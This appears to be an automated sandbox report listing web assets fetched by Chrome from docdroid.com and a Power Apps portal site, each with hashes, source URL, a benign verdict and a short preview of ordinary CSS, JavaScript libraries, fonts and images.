                                                                          Preview:.PNG........IHDR.......a.....].......IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (29284), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):29284
                                                                          Entropy (8bit):5.157696183655156
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:373A0F4982EEB929DEEBD5C0BBE66AC1
                                                                          SHA1:C6D9F8B084BCE13F01C69AD811DB49F893543660
                                                                          SHA-256:E5F0F16F639FB52A962F0ABB88DA619BC7806CE49939424D168AB91E58B80329
                                                                          SHA-512:DF73D3B8B03CF47C5DEC61BDFD6B88D3BB0366517370452022CADB9B6F0D29780F475A84DD1C0FF60D8C3810F3E97CA6C7809BCC9D06814B0F7C052BF5018236
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-style.bundle-373a0f4982.css
                                                                          Preview:.msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{position:absolute!important;z-index:1000;top:28px!important}html[dir=rtl] .msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{right:0!important}html[dir=ltr] .msos-open .msos-inner-container:not(.msos-fullscreen) .msos-selection-container{left:0!important}.msos-glyph:after{font-size:9px!important}.msos-label{margin-bottom:0}.msos-caret-button:focus{outline:0}.msos-selecteditems-container:focus{outline:0}.msos-container:not(.msos-disabled){border:1px solid #949494;box-shadow:inset 0 1px 1px rgb(0 0 0 /8%);transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.msos-container:not(.msos-disabled).msos-active{border:1px solid #949494!important;box-shadow:inset 0 1px 1px rgb(0 0 0 /8%);transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.msos-container:not(.msos-disabled).msos-focused{border-color:#69c!important;outline:0;box-shadow:inset 0 1px 1px rgb
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):1203
                                                                          Entropy (8bit):7.8004064736420355
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:15F563C53C16A8B903AD935CB0569147
                                                                          SHA1:F1D8D694AAAD33DDCB855B89389C7618C11F19C2
                                                                          SHA-256:B28C9D40C89006B841E22D9223C10CE3DD85BCA689E60051ECF58435266EBCEF
                                                                          SHA-512:2DCB40D4241594F2DDF3399A7E0D0A07FCC87874D5313C1039FDECAB5CB093EB60B8F5696436B6E3B8542F21FEF3C09A27162AE9B5626A42FA8EDB3D5E8BAEB3
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/images/favicon.png
                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...UIDATx.W[kTW.......g...MH..|......X.P."..KH}h..VKk.JI..P.bK.B../NMQb.(TG.e$!".F'.b2zb..Z...s.3.3.Yde.}........<......a.7...8.dJ....r,....I....%(C.?..r&.....n...~1w.{ ...3.4..r.B2XI..q#...<.d.....0R....9a.=F..&4C..%...A..-....F._...(....F.~....#.B..$7'rN....$..11.....2@.R......f.6...^........:9.];V....Z._w.FKc....%...........@oK..5.......M.K..!..v|a...U.).z5....6.].....n.(......l.............I.u.x..6..BTWSS...P.B....J.`v......Q......8=1^P..w.Tn...$...Q<z.Lm9w.6....P^..,`..)L..}......<../V...........|s.b(;...*...F...{...Q.jQ<;*..]].}..[Z.G.....c..c8/.....t..8......,......d.^....D~(..............c....j.~...t.ne........O.;.|...._s5a_.*..k.}j....y3.K.o..1..E|A..*e.?o.2......)|sZ0...s=......$.~...Y..1|{.*R...q.............!I.sA+.@D0.......T.8.g..C;.F.S.q...k.>3.....3....:..vn....l...3&.._....O.CC..0..&W]....HH..k..j|..x8..T......q.&....v.&....X....Py....3.g...=S....a'v.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65312), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):101839
                                                                          Entropy (8bit):4.782242219512222
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2CE6EFB497D50E0FBD335FF651D0E961
                                                                          SHA1:4A644F008F5535E2B15DE5A72ACD498C2D5C59C8
                                                                          SHA-256:37AD3F3C0DB53E8E6D68199A6DF828E7DB31ABE1DE721CB7475A840A6C10C215
                                                                          SHA-512:A613C8FC0805A9F35A83F422012CB9C8A7ABC334ACC6EBF1ABC4BFE8793AFC2A652BC60539DA2EC6182ED48628972B5DB16DFA3E4AF7E3A47AC9C634CF85897A
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.css
                                                                          Preview:/*!.. * Font Awesome Free 6.2.1 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License).. * Copyright 2022 Fonticons, Inc... */...fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):28
                                                                          Entropy (8bit):4.039148671903071
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4CF667D3B80E0F0B71EB3D93524D6374
                                                                          SHA1:6BD2E36A4CB2A335E97E172A008384AEC5DF9D8E
                                                                          SHA-256:96FB59D2C329A11AAC3DF530939F25C515E06A009DD069EC4C9F2FC5A8E62A24
                                                                          SHA-512:5214CF1F5C1D30E12BBCD4EC2E8B182141808196CFBC2BF0106DD389212824593511A3FC3C13C3D7DDCF73FE70E9A758380E7CB4874DF36C35B16CE6E7F51764
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCYyocwAvkSZUEgUNDksRgRIFDa3TapAhKKSdj2iyg4k=?alt=proto
                                                                          Preview:ChIKBw0OSxGBGgAKBw2t02qQGgA=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65465)
                                                                          Category:downloaded
                                                                          Size (bytes):621356
                                                                          Entropy (8bit):5.335064565929204
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C1E46F3736E7EB173192D1A3D0EEAF18
                                                                          SHA1:42AE4CC2AD5C3D8FB8D3B66B11ABA1CF5ADF4A84
                                                                          SHA-256:29149639F9CBEE96D0294611349496805021949C3EB1B7D46666656365081521
                                                                          SHA-512:3D28FFFA870EB8BB564E1B8561618DC29B08B355CC745B05A492418759644870BBF8D15A920446E6487079A8F663F2CDFFF147435A9D579C0DBFAEF5670BAC00
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/js/app.932.js?id=9c697e2892102e3de9de
                                                                          Preview:/*! For license information please see app.932.js.LICENSE.txt */.(self.webpackChunk=self.webpackChunk||[]).push([[932],{3932:(e,t,r)=>{e.exports={mixins:[r(8648),r(7867)],props:["documentJson","viewer","showAds","showExternalWindowLink","subscribed","pdfjsWorker"],data:function(){return{isEmbedded:self!=top,document:null}},mounted:function(){if(this.document=JSON.parse(this.documentJson),this.isEmbedded&&this.initIframe(),"undefined"!=typeof plausible){var e={};this.document.user&&this.document.user.id&&(e["Document Owner"]=this.document.user.id),plausible("pageview",{props:e})}this.initPageLevelAd()},methods:{initPageLevelAd:function(){this.shouldShowAds},initIframe:function(){this.showExternalWindowLink&&($(".navbar h1").html('<a href="'+self.location.href+'" target="_blank">'+$(".navbar h1").html()+" <i class='fa fa-external-link fs15 ml5'></i></a>"),$("a.navbar-brand").attr("href",self.location.href),$(".navbar a").attr("target","_blank"),$("#toolbar .externalWindow").removeClass("
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                          Category:dropped
                                                                          Size (bytes):17174
                                                                          Entropy (8bit):2.9129715116732746
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65472)
                                                                          Category:downloaded
                                                                          Size (bytes):740400
                                                                          Entropy (8bit):5.819475256234467
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:334AFD2D191DFF4EB5B00A14E3DB651E
                                                                          SHA1:F3FBA613505707488A782D63494FEB6431B653C8
                                                                          SHA-256:571697F08F6ED136506B2839AC01B88877E5E5E17201A5DB2FE5F1733AD51593
                                                                          SHA-512:785D5DD934D9ED89216E7914004DAD447F16224E4EDE054A819E720769C9B5A5EC4F88078CB4BCFD8F32CF1B0C05AC7A03788ED866D7DB6D7D035B256B272E11
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/js/app.js?id=334afd2d191dff4eb5b0
                                                                          Preview:/*! For license information please see app.js.LICENSE.txt */.(()=>{var e,t,n={7757:(e,t,n)=>{e.exports=n(3076)},9669:(e,t,n)=>{e.exports=n(1609)},5448:(e,t,n)=>{"use strict";var r=n(4867),a=n(6026),i=n(5327),s=n(4109),o=n(7985),u=n(5061),l="undefined"!=typeof window&&window.btoa&&window.btoa.bind(window)||n(4657);e.exports=function(e){return new Promise((function(t,d){var c=e.data,h=e.headers;r.isFormData(c)&&delete h["Content-Type"];var f=new XMLHttpRequest,p="onreadystatechange",m=!1;if("undefined"==typeof window||!window.XDomainRequest||"withCredentials"in f||o(e.url)||(f=new window.XDomainRequest,p="onload",m=!0,f.onprogress=function(){},f.ontimeout=function(){}),e.auth){var _=e.auth.username||"",y=e.auth.password||"";h.Authorization="Basic "+l(_+":"+y)}if(f.open(e.method.toUpperCase(),i(e.url,e.params,e.paramsSerializer),!0),f.timeout=e.timeout,f[p]=function(){if(f&&(4===f.readyState||m)&&(0!==f.status||f.responseURL&&0===f.responseURL.indexOf("file:"))){var n="getAllResponseHeade
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16
                                                                          Entropy (8bit):3.625
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:6680F9E50AAB58DE84596E6218CE61EF
                                                                          SHA1:55FBC0E2B856970716BA0D4270261EA2AEAB5C88
                                                                          SHA-256:0466C43B8B4E079F26ED0581B7AA95DD6DC4A3F0E4397D601C22120A25E125BA
                                                                          SHA-512:36CA54D8FCC37D70569A746B4F376387A7F180D2F276559661F8565D5A663FE333381B8ED77E8CC7F07C886AA99DC9FEC33694CEF32DDDB100436D79758DC186
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCQhUs_nCHwJtEgUNDksRgSFEuSyq_VZ8nw==?alt=proto
                                                                          Preview:CgkKBw0OSxGBGgA=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (30527)
                                                                          Category:downloaded
                                                                          Size (bytes):31743
                                                                          Entropy (8bit):4.772180971701416
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:1E2B241581EC99BB08EFD6979B26DC71
                                                                          SHA1:AFD94ACE4115760CCC234D2041E68B2A126B8E48
                                                                          SHA-256:0398B756E4E17FA5F5BAB60BDAC9EF110BA6D2C7F185D66D3EBA7712EEA66BDE
                                                                          SHA-512:B5BD39A7DFAB3CABD493EDFC120D8E1868C10698E6427555710707C446E9C1EED15242C91A1C45758CD264A689EE95B1DC0A05B2538105246E4A9371BCF6DE2F
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/css/fonts.css?id=1e2b241581ec99bb08ef
                                                                          Preview:@font-face{font-family:Open Sans;font-style:normal;font-weight:300;src:local(""),url(/fonts/open-sans-v34-latin-300.woff2?c93abfae8b4c45ec09295412e7e750f8) format("woff2"),url(/fonts/open-sans-v34-latin-300.woff?fbaa05ad22cd4594290a95b18ed12ce7) format("woff")}@font-face{font-family:Open Sans;font-style:normal;font-weight:400;src:local(""),url(/fonts/open-sans-v34-latin-regular.woff2?a1535f451fb7bb98f526f30e1050f487) format("woff2"),url(/fonts/open-sans-v34-latin-regular.woff?7958f4e4a2bb8025ef862d63e8419f43) format("woff")}@font-face{font-family:Open Sans;font-style:normal;font-weight:600;src:local(""),url(/fonts/open-sans-v34-latin-600.woff2?7ef3bbc98d285227e83a644f04ef14a7) format("woff2"),url(/fonts/open-sans-v34-latin-600.woff?f031bf84d9797276192cd9fb5fc38130) format("woff")}@font-face{font-family:Open Sans;font-style:normal;font-weight:700;src:local(""),url(/fonts/open-sans-v34-latin-700.woff2?b245bc85ddeedb27a5498aabf8807c76) format("woff2"),url(/fonts/open-sans-v34-latin-700.wo
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:assembler source, ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):32395
                                                                          Entropy (8bit):4.985437520840124
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:FA694BC0473766A8E8F1CDEFB9007BBB
                                                                          SHA1:7F69530F8431FA456B9C0C02B65E7C2E197A98C2
                                                                          SHA-256:AB189E68B67A70C8B40043A6734C512439214A072F5F90C69860A5BA42E71880
                                                                          SHA-512:17A65600CB28C67994C71C18012EEC128FC64D0E71C619509DD73BE12061304E401313D3B32274CE2C151BF4468F434A781819843912C29B9BFFB3496BAFDFB7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://site-xtxg5.powerappsportals.com/theme.css
                                                                          Preview:/*!.. * Bootstrap v3.3.6 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */....h1.underline,..h4.underline {.. border-bottom: 1px solid #bcbcbc;.. padding-bottom: 21px;..}....@media (max-width: 767px) {.. .. .text_center-mobile {.. text-align: center;.. }..}.......btn-lg-home {.. padding: 20px 40px;.. font-size: 15px;..}.......btn-info-home {.. color: #fff;.. border-color: #fff;.. background: transparent;..}.....btn-info-home:hover {.. color: #000;.. border-color: #000;.. background: #fff;..}.....btn-info-home:active {.. color: #000;.. border-color: #000;.. background: #fff;..}.....btn-info-home:focus {.. color: #000;.. border-color: #000;.. background: #fff;..}.......breadcrumb > li a {.. color: #302ce1;.. padding: 2px 4px;..}...breadcrumb > li a:hover {.. color: #302ce1;..}.......pagination > li > a,...pagination > li > span {.. background-color: transparent;..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65300), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):194905
                                                                          Entropy (8bit):5.014651527034942
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:30EAFD8EF153814B788EB71DB3F1B99C
                                                                          SHA1:3C7BD538F6307CAE3DE00D64BD2B742B9E4AFE3B
                                                                          SHA-256:7FCFD614F45FE132CC914BEEAC10592711BF2760E3732D85DFAFEB4022A3C914
                                                                          SHA-512:82FE723645A952B3609BF3DBA38521D4CDA2B00E95EF7465257B01F3A0BD1EAA2A0D0EBCBB36E4C792296B6739CDDA4862380CCCD0DECBBC786F351E82ED1192
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://site-xtxg5.powerappsportals.com/bootstrap.min.css
                                                                          Preview:@charset "UTF-8";/*!.. * Bootstrap v5.2.2 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors.. * Copyright 2011-2022 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 150516, version 770.768
                                                                          Category:downloaded
                                                                          Size (bytes):150516
                                                                          Entropy (8bit):7.9968634709884325
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:328A9D0F59F0EBB55CDDAC6F39995BEA
                                                                          SHA1:C0E6E76B4A02C34656FF2A41B671E02F2821829B
                                                                          SHA-256:8F06540FD77F1EFFE1E2DA8EA10CEC4A382DDA9CC6EF05D816E1D6DE444072F2
                                                                          SHA-512:5B12555B07818D96107E9A4F692FC6C620BA9D0FCF6029E7883C7CD375A16C88061B388CD72754C1421D4683F3EB84C314A223FD9E51B8B2E5D431FB2AFE8312
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/fonts/fa-solid-900.woff2
                                                                          Preview:wOF2......K...........K..........................8.$. .`..<........@..p. .w..Dp......aD.f./.Y...PUUUU5)!.1.v...*..O~.._..w..._..............K`pL.?L.v\...7../..{g..4....,.)4.....E8....0...1.....i;....s...J...57.AE.LT\6...../.}r.....L..%y.~..R....=....n.V.IqX......(.........t.D....s.}.5......u;.h.3..2...TE.'.P...8...!..r.. .`.....C..=U..[.<.....'.V.W..TR.d.$...K..X.-5N...=7.@^.>.%/..q/...}@.e.{.'S.....?...3}...`g.h[.......X@Q..J..:Ul.M...]........X.....Mw...N...\.i>]r.}.d......>.=...PXD. DB.%..DB.Y..k<.X..5Nc.K*..:.T.u%n.....g..g;.O..unw........1.o,.......A..H..m..M.,..L;.R..8M.i..JG.d.V.f......K..7..;]..<N.?...$K.d.1.95.rMI.....pq.3.Y.,q.........\x......=q.....F6...zf..It..aN...2qJ..AG.I..akoE...`........Ih..h(....k=....l..Q...$.5C48..4g..~US.:T.TB.d..[.l....s.;<...w.DQ...@.<...k...3..B.......I.{....R$......G....p.+.:..ph.F..<.O}.]....s[X..I...x.........9..${.....g..n..v.,V\@...-......V.Nf.5...c...Q.2...0.8j.Z...+.......33...!..!..C0w
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65445)
                                                                          Category:downloaded
                                                                          Size (bytes):540048
                                                                          Entropy (8bit):5.302089229352873
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:CF8E0FD9421E12CFB59F0266E0273F7D
                                                                          SHA1:62EF88B36C4A8C0475E10DFD80A4F7E588AA1F15
                                                                          SHA-256:522C2E27DB64974813E59251D101596A7692A9B964771A9CE3F1978247862258
                                                                          SHA-512:224B4823B23AC17E328194A285B48FCE4244D2649E66CCC9A7DFBC8AFD8AEA5C1E1D4A5AEFF181734DB48F5FDC407EA3ABDF66362912E6EE520CBB01C9BFDA18
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.moment_2_29_4.bundle-cf8e0fd942.js
                                                                          Preview:/*! jQuery v3.6.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(k,e){"use strict";var t=[],n=Object.getPrototypeOf,a=t.slice,m=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},l=t.push,s=t.indexOf,i={},r=i.toString,g=i.hasOwnProperty,o=g.toString,u=o.call(Object),v={},y=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},_=function(e){return null!=e&&e===e.window},D=k.document,h={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,i){var n,s,r=(i=i||D).createElement("script");if(r.text=e,t)for(n in h)(s=t[n]||t.getAttribute&&t.getAttribute(n))&&r.setAttribute(n,s);i.head.appendChild(r).parentNode.removeChild(r)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:assembler source, ASCII text, with very long lines (32157)
                                                                          Category:downloaded
                                                                          Size (bytes):480564
                                                                          Entropy (8bit):5.199467210117563
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:61033083A241CD3D3095C19961F8BB00
                                                                          SHA1:19AB316B7551DEA76D6E99ACA885B5B1D97BF9A2
                                                                          SHA-256:E244173F3F60ED97853F6C77EFC7916A6CF083487B8E586A3620BACFEDF90242
                                                                          SHA-512:E6D8104817DD33E10F8AD8AD3F13F08E302214F414066052903E6C9EF55D7A5E958621C7232C4B128072FCD78207B7B47EB6A44A901F9886A40DABD2FBC6909E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/css/app.css?id=61033083a241cd3d3095
                                                                          Preview:.textLayer{position:absolute;text-align:initial;left:0;top:0;right:0;bottom:0;overflow:hidden;opacity:.2;line-height:1;-webkit-text-size-adjust:none;-moz-text-size-adjust:none;text-size-adjust:none}.textLayer br,.textLayer span{color:transparent;position:absolute;white-space:pre;cursor:text;transform-origin:0 0}.textLayer span.markedContent{top:0;height:0}.textLayer .highlight{margin:-1px;padding:1px;background-color:#b400aa;border-radius:4px}.textLayer .highlight.appended{position:static}.textLayer .highlight.begin{border-radius:4px 0 0 4px}.textLayer .highlight.end{border-radius:0 4px 4px 0}.textLayer .highlight.middle{border-radius:0}.textLayer .highlight.selected{background-color:#006400}.textLayer ::-moz-selection{background:#00f}.textLayer ::selection{background:#00f}.textLayer br::-moz-selection{background:transparent}.textLayer br::selection{background:transparent}.textLayer .endOfContent{display:block;position:absolute;left:0;top:100%;right:0;bottom:0;z-index:-1;cursor:default
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):72
                                                                          Entropy (8bit):4.241202481433726
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 10 x 10, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):237
                                                                          Entropy (8bit):6.43867499964275
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:74710B068526106916E5A9AE5B70FA64
                                                                          SHA1:2E7344458A5EB6EFB65976EE144BBEDBA680B5AC
                                                                          SHA-256:55B9B171BB9BC15ACDD21C7A186E1268BC774B6A7C5A6FBC2F2BFEE564890325
                                                                          SHA-512:6D66F49A52C8A4E0EEB0C4F67DC85CAFEE5C2F8716E8E80EB5BE6C266F4E7CFC161EA5B0937A383BA13B1DD5B97742D70FA9630A502F87BE622FF0512BA63047
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR..............2.....pHYs.................sRGB.........gAMA......a.....IDATx...... ...(./K vd........v........!.`?p.......]'g.."...,6%..`gC..%`s.$"..<...=....e..4X.._kQ...e..h.-.}...3=.e/.D..C....ob41.x.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 24 x 24
                                                                          Category:downloaded
                                                                          Size (bytes):2545
                                                                          Entropy (8bit):7.142191857408522
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:FAA74E8C61FC64D5EDB11613C7EEAD2C
                                                                          SHA1:E043879D3EE94A3EDF10260F21F44BFA4A6FC66E
                                                                          SHA-256:483C4A0396691993A641EC409C44B8B7E1DAAB0AE7E2B2944C4BC59520BB7655
                                                                          SHA-512:451DB4141333FE6561E6259352B6259F80A2B080380D48117B693CC1EA1D6F3CECB5F4A4493AF11C734989E4096B01BAD2B31E47D2E13718628AC254C4DEB70E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/images/vendor/pdfjs-dist/web/loading-icon.gif?ff2dfa442d903d9d5e303345b82e5415
